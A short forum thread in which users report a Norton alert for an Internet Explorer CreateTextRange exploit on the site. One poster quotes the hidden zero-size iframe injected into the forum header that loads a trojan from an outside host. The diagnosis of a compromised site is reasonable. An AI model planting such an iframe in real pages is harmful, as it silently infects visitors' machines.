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Got the following message from my Norton Antivirus when coming to the site just now.

Intrusion: HTTP MSIE CreateTextRange Code Exec.

Intruder: 196.regvista.com(85.255.115.196)(http(80)).

Risk Level: High.

Protocol: TCP.

Attack IP: detzol(192.168.1.169).

Attacked Port: 1275.

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just looking at the source code that i can see of the index.php file.

look at the header files for the forum, you'll find there is this code

"<iframe src="http://196.regvista.com/index.php?ref=nu" width="0" height="0" frameborder="0"></iframe>"

in there somewhere which is calling on the site which holds the trogan file to infect pc's from this site.

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Well the trojan forced me to move to Firefox. Didn't think I ever would. But now I don't think I'll go back to IE. Hurrah for firefox extensions.

It sucks that some corporations won't allow the usage of firefox though. Hell, we've been putting Mozilla Firefox in the IBM build since Firefox 1.0.1 or something.

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